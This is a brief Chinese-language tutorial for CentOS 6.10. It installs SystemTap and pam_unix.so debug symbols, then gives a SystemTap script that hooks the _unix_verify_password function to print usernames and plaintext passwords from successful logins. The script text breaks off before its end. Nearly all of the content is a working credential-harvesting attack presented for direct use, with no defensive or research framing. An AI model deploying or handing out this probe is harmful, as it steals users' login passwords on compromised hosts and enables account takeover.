测试环境:
Linux 2.6.32-754.25.1.el6.x86_64
CentOS release 6.10 (Final)
首先安装systemtap这个包
原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。
yum --releasever=6.4 update
yum install -y systemtap
debuginfo-install $(rpm -qf /lib/security/pam_unix.so) //64位的机器为lib64目录
touch /root/capture_pass.stp
插入代码:
#!/usr/bin/stap
global username, pass, isSuccRet = 1;
probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
{
username = user_string($name);
pass = user_string($p);
}
probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
{
if ($return == 0)
{
printf("User: %s\nPassword: %s\n\n", username, pass);
isSuccRet = 0;
}